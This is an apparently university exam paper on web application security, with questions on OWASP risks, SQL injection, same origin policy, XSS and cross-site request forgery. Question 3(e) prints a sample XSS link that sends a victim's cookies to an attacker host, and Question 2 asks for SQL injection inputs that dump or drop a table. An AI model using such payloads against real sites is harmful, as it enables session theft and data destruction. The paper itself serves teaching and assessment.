BSc (Hons) Web Technologies Examinations for 2013 – 2014

BSc (Hons) Web Technologies
Cohort: BWT/11/FT
Examinations for 2013 – 2014/ Semester 2
MODULE: ADVANCED WEB TECHNOLOGIES
MODULE CODE: SECU3107C
Duration: 3 Hours
Instructions to Candidates:
1. Answer ALL questions.
2. Questions may be answered in any order but your answers must show
the Question number clearly.
3. Questions carry equal marks.
4. Always start a new question on a fresh page.
5. Total marks to be scored 100.
This Question Paper contains 4 questions and 5 pages.
Page 1 of 5
Advanced Web Technologies (SECU 3107C)
SITE/VK 2013-2014 S2
ANSWER ALL QUESTIONS
QUESTION 1: (25 MARKS)
(a) Briefly describe any two of the Top 10 OWASP web application
security risks for 2013.
(4 marks)
(b) Currently, hackers are attempting to attack client software instead of
server software. Explain why.
(3 marks)
(c) What is a regression bug? Give two instances when regression bugs
are most likely to occur.
(2 + marks)
(d) Give three reasons why security vulnerabilities are expensive to fix.
(6 marks)
(e) Briefly discuss three secure design principles.
(6 marks)
QUESTION 2: (25 MARKS)
(a) Briefly explain SQL Injection attacks.
(3 marks)
(b) Given the following SQL statement:
SELECT email, passwd, login_id, full_name
FROM Members
WHERE email = '$EMAIL';
Which crafted input in the email field would allow an attacker to
i. view every item in the Members database?
(5 marks)
ii. delete the table Members from the database?
(5 marks)
Explain your answers.
(c) To mount an SQL injection attack, the attacker often needs to know
table names from the web application's database.
i. How does an attacker attempt to learn such information about the
database?
(2 marks)
ii. Describe two ways in which this can be prevented.
(4 marks)
(d) Two approaches to preventing SQL injection attacks are
Blacklisting and Whitelisting. Which of these two approaches is
more effective? Justify your answer.
(6 marks)
QUESTION 3: (25 MARKS)
(a) What is the security provided by the "Same Origin Policy" in web
browsers?
(2 marks)
(b) Consider the following URL: http://www.utm.ac.mu/courses/
State whether each of the four URLs below is of the same origin as the
above URL.
i. ftp://www.utm.ac.mu/timetable/
ii. http://www.utm.ac.mu/timetable/
iii. http://www.utm.mu/programmes/
iv. http://www.utm.ac.mu:82/courses/
(4 marks)
(c) The Same Origin Policy allows scripts (<script>) to be loaded from other
origins and executed in the context of the actual application. Give
examples of two other tags involved in cross-origin communications
allowed by the browser.
(2 marks)
(d) How can an attacker find out whether a web application is vulnerable
to XSS attacks?
(4 marks)
(e) Consider the following link from a malicious web site:
<a href="http://www.mcb.com/search?searchTerm=<script>document.location='http://www.badguy.com/'+document.cookie;</script>">Click Here to Win Rs 1000</a>
Assume that the web site is vulnerable to XSS attack.
i. What will happen when a user clicks on the link?
(6 marks)
ii. The HREF destination is displayed when the mouse hovers over the link.
How can attackers disguise the link such that the victim user
does not suspect the attack?
(3 marks)
(f) There are two types of XSS: reflected XSS and stored XSS. Which
attack affects many users? Explain why.
(4 marks)
QUESTION 4: (25 MARKS)
(a) Cookies are divided into two classes with respect to how long they
are cached by the browser. Briefly describe these two classes of
cookies and their storage.
(6 marks)
(b) Alice is reading from a News web site.
She opens another tab and logs into her online library application
using HTTP authentication. She searches for some books and then
closes the tab.
She then resumes reading some article from the News web site.
Finally, she opens a web site from www.bad.com.
If the www.bad.com website attempts to send a XSRF request to the
online library application, will the forged request from Alice's browser
be able to perform some trusted action? Justify your answer.
(4 marks)
(c) Can SSL prevent XSRF? Why?
(3 marks)
(d) One way to prevent XSRF is for the server to inspect the Referer
header of the request.
i. How could this approach prevent XSRF?
(4 marks)
ii. Discuss the effectiveness of this approach.
(4 marks)
iii. Briefly describe a more effective protection against XSRF.
(4 marks)
***END OF QUESTION PAPER***